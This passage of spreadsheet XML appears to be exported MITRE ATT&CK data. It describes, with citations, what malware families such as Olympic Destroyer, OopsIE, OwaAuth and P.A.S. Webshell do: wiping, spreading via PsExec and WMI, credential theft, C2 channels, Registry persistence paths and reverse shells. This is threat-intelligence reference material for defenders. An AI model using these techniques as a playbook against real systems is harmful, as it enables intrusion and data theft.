    <t xml:space="preserve">[Olympic Destroyer](https://attack.mitre.org/software/S0365) overwrites files locally and on remote shares.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020) </t>
  </si>
  <si>
    <t>relationship--7767d727-fba8-4b7a-b7fe-137ed9261680</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</si>
  <si>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</si>
  <si>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relationship--e4c2c54e-3980-45a4-92cb-c0d99bc0a428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</si>
  <si>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</si>
  <si>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relationship--e998971c-c944-4255-8831-89d49d0e5285</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) attempts to copy itself to remote machines on the network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--7e8101ce-f787-45f7-a593-62b664fbe08d</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--c72b2674-e757-4290-9275-cc08a12713be</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to enumerate all systems in the network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--c4a8a9ea-c24a-4ddf-9451-5855da9a4251</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [PsExec](https://attack.mitre.org/software/S0029) to interact with the &lt;code&gt;ADMIN$&lt;/code&gt; network share to execute commands on remote systems.(Citation: Talos Olympic Destroyer 2018)(Citation: PsExec Russinovich)</t>
  </si>
  <si>
    <t>relationship--ddf5cb3a-6cfa-40c8-8992-396329632f14</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) utilizes [PsExec](https://attack.mitre.org/software/S0029) to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--c992481b-fe93-416d-b8a3-c5ed752c17f4</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses the API call &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; to disable all services on the affected system.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--24af852e-f761-4c75-8aa0-edc3198bd7eb</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses API calls to enumerate the infected system's ARP table.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--039364a9-2afd-4ae5-9df0-08d4e583674f</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) will shut down the compromised system after it is done modifying system configuration settings.(Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020)</t>
  </si>
  <si>
    <t>relationship--4932951a-b313-4024-bbad-434de3b747c5</t>
  </si>
  <si>
    <t>[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses WMI to help propagate itself across a network.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>relationship--8e883c7a-3f13-42f6-8cf5-ce373586487e</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) can use a custom decryption algorithm to decrypt strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--e1fba82d-1cd2-4906-92db-ba3aafad72ca</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) has the capability to use a Denial of Service module.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--5e5b108b-fec6-4d44-ad9a-9302d4f6e368</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) steals credentials from its victims.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--37ad61e7-6520-47d0-81ae-f3d129b49ac1</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) uses Twitter as a backup C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--6b39985b-2e2f-4d54-9211-aef4d94b318f</t>
  </si>
  <si>
    <t>[OnionDuke](https://attack.mitre.org/software/S0052) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--b4228f64-bc0c-47a5-a3d8-d9aabdf66bfc</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with a simple character replacement scheme before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--87b3ebab-fb4d-44c2-b8ad-9fffbac277f3</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) compresses collected files with GZipStream before sending them to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--b05da4f4-a47f-42d9-8464-58c6960a767a</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) exfiltrates command output and collected files to its C2 server in 1500-byte blocks.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--1abf4f3f-85e7-4bd1-9432-bddd40a0ad75</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--3cd2c187-587c-4969-957d-122ce654fc2a</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) can upload files from the victim's machine to its C2 server.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--fbf22973-f91d-440a-9559-65bc2d8e3739</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) has the capability to delete files and scripts from the victim's machine.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>relationship--3d4a9fd6-34cb-4883-a00c-4aea3d00869e</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) can download files from its C2 server to the victim's machine.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>relationship--978dbb17-c5c5-4248-8385-9dc6f691030b</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) stages the output from command execution and collected files in specific folders before exfiltration.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--0634c754-9660-414f-8304-d9d92e37a0ce</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</si>
  <si>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</si>
  <si>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relationship--ec9e1757-50c1-4fd8-a0be-2694b1bc9e99</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) creates a scheduled task to run itself every three minutes.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>relationship--ce459961-3a5a-45f9-b8a4-646e9b475e19</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--d5c6c2bd-e49f-4d88-9351-a1c3d7f3ef99</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) encodes data in hexadecimal format over the C2 channel.(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--578a4fd8-7c24-44b2-a7c3-1a47786d3c9a</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</si>
  <si>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</si>
  <si>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relationship--6a93c25c-c9cb-4cd9-a36b-1f2353e91e32</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) checks for information on the CPU fan, temperature, mouse, hard disk, and motherboard as part of its anti-VM checks.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>relationship--6a289837-2455-471b-81e4-b677550ab77b</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) checks to see if the system is configured with "Daylight" time and checks for a specific region to be set for the timezone.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>relationship--db4fbefd-e9ed-495a-89af-67c4b6780508</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) creates and uses a VBScript as part of its persistent execution.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>relationship--acb06172-23a6-4190-a568-63da13491e6e</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses HTTP for C2 communications.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>relationship--6cb293a0-aa2b-4919-b1ac-a801608aa4b5</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses the command prompt to execute commands on the victim's machine.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>relationship--7df01656-109b-49ad-a9e4-c1b89ba82508</t>
  </si>
  <si>
    <t>[OopsIE](https://attack.mitre.org/software/S0264) uses WMI to perform discovery techniques.(Citation: Unit 42 OilRig Sept 2018)</t>
  </si>
  <si>
    <t>relationship--5422e9a8-4fbe-40c0-8348-53faa9a7d2d3</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) has used Technet and Pastebin web pages for command and control.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--1a04e8c4-f697-446b-810a-8162ad7353ef</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather victim drive information.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--0188b7af-d060-4715-baf2-ad69333482dc</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can overwrite Registry settings to reduce its visibility on the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--31501f0f-e5be-4980-a2f1-b241d68f654c</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can download files onto the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--73db6a54-2270-431b-b7eb-2c5c71389637</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can perform Registry operations.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--93addaa1-7baa-4fdd-ab92-3e58865a5ef2</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) strings are base64 encoded, such as the embedded DLL known as MockDll.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--fa6f0d89-8a80-421b-bcb1-ef5ee31f0879</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather a process list from the victim.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--1fbd687c-3e02-43b8-a160-4319a7d754ac</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses process hollowing and [Regsvr32](https://attack.mitre.org/techniques/T1218/010) to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--e039e3d4-2e3d-4e6e-902e-5e1834abe8e4</t>
  </si>
  <si>
    <t>Some [Orz](https://attack.mitre.org/software/S0229) versions have an embedded DLL known as MockDll that uses [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) and regsvr32 to execute another payload.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--18d4782f-0e33-4bf5-b0a2-8dc04cacb617</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather the victim's Internet Explorer version.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--70059c24-ccde-4832-854e-3bcb71c294a9</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather the victim OS version and whether it is 64 or 32 bit.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--23d16034-a2eb-40ef-857b-63708e63bf9a</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can gather victim proxy information.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--c6f0fa41-e240-4184-a0d4-292fb46de3fa</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) can execute shell commands.(Citation: Proofpoint Leviathan Oct 2017) [Orz](https://attack.mitre.org/software/S0229) can execute commands with JavaScript.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>relationship--06814fdf-8bf8-43eb-b448-812541b46afa</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can copy files and Registry data from compromised hosts.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--ad701054-044b-4e9a-a96b-4a477ae874b2</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can parse e-mails on a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--c69d17b1-c261-44c6-9da5-c310cf20f91b</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) has the ability to encode data.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--28c56887-5dbb-4269-b783-8a7f8d4c9204</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can use HTTP and HTTPS in communications with remote hosts.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--1e2a3e72-5d25-47fb-b0ff-e804073cc272</t>
  </si>
  <si>
    <t>[Out1](https://attack.mitre.org/software/S0594) can use native command line for execution.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--2eea60ff-d673-49aa-b360-49cc32763ff1</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can automatically scan for and collect files with specific extensions.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--82b85b1c-e6f8-443a-b64a-11b63907755f</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can automatically upload collected files to its C2 server.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--667592ad-e249-4efd-933f-75a53b25567a</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can collect information from a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--441cd636-cb84-4541-b444-09881d015c43</t>
  </si>
  <si>
    <t xml:space="preserve">[OutSteel](https://attack.mitre.org/software/S1017) can upload files from a compromised host over its C2 channel.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) </t>
  </si>
  <si>
    <t>relationship--0f483f1d-cd24-4446-8725-8af01fcd089c</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can delete itself following the successful execution of a follow-on payload.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--c78fb99e-8967-4854-bdfb-036ae209abec</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can search for specific file extensions, including zipped files.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--8060addd-e961-41e2-a835-9343153b7522</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can download files from its C2 server.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--e12c4451-5d26-4eea-a7e9-fcdfd517e77d</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has relied on a user to execute a malicious attachment delivered via spearphishing.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--aa256f57-243f-4a52-90c9-8f9037a28fe2</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has relied on a user to click a malicious link within a spearphishing email.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--24caab23-239c-4012-bb62-5b843f1ff767</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) can identify running processes on a compromised host.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--e7cd2966-db55-4214-abcc-78b5bc1e00cd</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has been distributed as a malicious attachment within a spearphishing email.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--c767de3c-af29-4e98-8292-067359765d5f</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has been distributed through malicious links contained within spearphishing emails.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--1d0af393-5340-4bee-bccc-b1007853276a</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has used HTTP for C2 communications.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--d5ebb264-c9ae-44bb-b6d0-5bf490cb2f76</t>
  </si>
  <si>
    <t>[OutSteel](https://attack.mitre.org/software/S1017) has used `cmd.exe` to scan a compromised host for specific file extensions.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )</t>
  </si>
  <si>
    <t>relationship--04f0ecb5-4647-4f96-9439-7e2255da11c8</t>
  </si>
  <si>
    <t>S0072</t>
  </si>
  <si>
    <t>OwaAuth</t>
  </si>
  <si>
    <t>malware--a60657fa-e2e7-4f8f-8128-a882534ae8c5</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--a83992e1-5be5-433e-b3f1-d9ccde98c9ca</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has a command to list its directory and logical drives.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--358047bf-1dd3-4fc4-bc1a-b7004bd54b8d</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has been loaded onto Exchange servers and disguised as an ISAPI filter (owaauth.dll). The IIS w3wp.exe process then loads the malicious DLL.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--c1884e62-7b2e-45a1-89fd-c76b1b717f50</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) captures and DES-encrypts credentials before writing the username and password to a log file, &lt;code&gt;C:\log.txt&lt;/code&gt;.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--33caa1a2-8465-47b9-89c4-94f4e9a899c7</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</si>
  <si>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</si>
  <si>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relationship--1088fc27-2de5-4b73-83fd-6741ab3ff4d6</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) has a command to timestop a file or directory.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--37804b22-63b4-4b24-846e-6541688d9213</t>
  </si>
  <si>
    <t>[OwaAuth](https://attack.mitre.org/software/S0072) uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--d53d1e84-f4de-4e6a-bc84-5edfce84b055</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</si>
  <si>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</si>
  <si>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relationship--0dee5507-6e61-4244-86a8-c7e8a34469da</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to create reverse shells with Perl scripts.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--7e3bdb4d-76b3-42ce-8f68-587320e39ec7</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to list and extract data from SQL databases.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--cba11c5f-afe2-42e1-8995-8b1105d75e7a</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to copy files on a compromised host.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--1a0117d8-422f-48ed-be65-9d2fcaf12ed9</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use a decryption mechanism to process a user supplied password and allow execution.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--0686ee2f-ff46-418b-b6e8-1766e4dc33a8</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can delete scripts from a subdirectory of /tmp after they are run.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--9cbb4f4c-c25f-42c4-a5ba-52e70a6654bd</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to list files and file characteristics including extension, size, ownership, and permissions.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--093bc793-3edd-4096-bd7b-aeb5c855128b</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can upload and download files to and from compromised hosts.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--f77760d0-35c1-4e91-98b9-2ac57ba183d5</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to modify file permissions.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--3062f5f2-8a0d-4a1b-ac64-aa6c3b06a1a5</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can display the /etc/passwd file on a compromised host.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--f78eb569-6e16-4103-bc17-265f2d1b1bb2</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can scan networks for open ports and listening services.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--a0bb2dec-515f-4334-97c1-63fa6c9b4340</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use encryption and base64 encoding to hide strings and to enforce access control once deployed.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--8c73e0be-f105-4f22-93b4-cb765fb8f419</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--ed00df58-4656-4c62-8ef1-8b859f46c1ed</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can list PHP server configuration details.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--87e99b39-e634-477e-b260-6098abc58dc2</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can issue commands via HTTP POST.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--4901215f-3cfb-4db3-9afb-4d063c1eb83a</t>
  </si>
  <si>
    <t>[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can gain remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>relationship--0b41b24d-3a8b-4d73-95bf-9b5b486978d8</t>
  </si>
  <si>
    <t>S0016</t>
  </si>
  <si>
    <t>P2P ZeuS</t>
  </si>
  <si>
    <t>malware--b2c5d3ca-b43a-4888-ad8d-e2d43497bf85</t>
  </si>
  <si>
    <t>[P2P ZeuS](https://attack.mitre.org/software/S0016) added junk data to outgoing UDP packets to peer implants.(Citation: Dell P2P ZeuS)</t>
  </si>
  <si>
    <t>relationship--04ba0d26-d931-423e-a3de-713892c0af97</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) can download additional payloads to a target system.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--96b018b8-701c-4658-b58b-716ba632fd72</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) can send randomly-generated data as part of its C2 communication.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--7473a1e1-12b5-41b5-ab49-b05a817cdf43</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) can check for specific processes associated with virtual environments.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--56e2010e-20d2-4484-b8ee-742b81b8fcdb</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) can check the compromised host for processes associated with VMware or VirtualBox environments.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--88f03e47-d816-4d46-ae13-6ce121f1f2a2</t>
  </si>
  <si>
    <t>[P8RAT](https://attack.mitre.org/software/S0626) has the ability to "sleep" for a specified time to evade detection.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--0550f254-d194-4f84-b005-b7a2cdc94a4e</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is capable of manipulating the Registry.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--202b96f6-0f7c-4aed-8004-780f1d880059</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) communicates via ICMP for C2.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--fce7fac2-91da-4903-95dc-fb54650c0859</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is capable of creating reverse shell.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--ecb5e830-b678-47a6-98a2-d4dbe162f09e</t>
  </si>
  <si>
    <t>An older variant of [PLAINTEE](https://attack.mitre.org/software/S0254) performs UAC bypass.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--8bb8c2ab-b701-4a09-902b-a2ddf8d36451</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) has downloaded and executed additional plugins.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--fdea1dc1-4b00-411e-a5d3-cd72688237b5</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses &lt;code&gt;reg add&lt;/code&gt; to add a Registry Run key for persistence.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--5bbe7733-4e20-4ee1-a29c-b8e7111781dd</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) performs the &lt;code&gt;tasklist&lt;/code&gt; command to list running processes.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--91b6a6e1-c0eb-4bd8-84d4-4c31caf2ba6a</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) gains persistence by adding the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--baca2e38-a6fa-430e-a829-7afc5537e45f</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) encodes C2 beacons using XOR.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--e0d5dda2-3fc1-4dde-aebe-fb6e31023195</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) collects general system enumeration data about the infected machine and checks the OS version.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--072af62a-85d5-4803-aa05-d7c6efa9ec2a</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses the &lt;code&gt;ipconfig /all&lt;/code&gt; command to gather the victim’s IP address.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--5f8e0db4-70d8-49c3-9b57-f6296ec8357f</t>
  </si>
  <si>
    <t>[PLAINTEE](https://attack.mitre.org/software/S0254) uses cmd.exe to execute commands on the victim’s machine.(Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>relationship--ebc8ea86-6847-494a-b304-b6750a2f54e5</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list open windows on the compromised host.(Citation: TrendMicro BlackTech June 2017)(Citation: TrendMicro BlackTech June 2017)</t>
  </si>
  <si>
    <t>relationship--e98a5dc7-707a-4933-801a-b98b2e44b309</t>
  </si>
  <si>
    <t>[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved passwords from Microsoft Outlook.(Citation: ESET PLEAD Malware July 2018)</t>
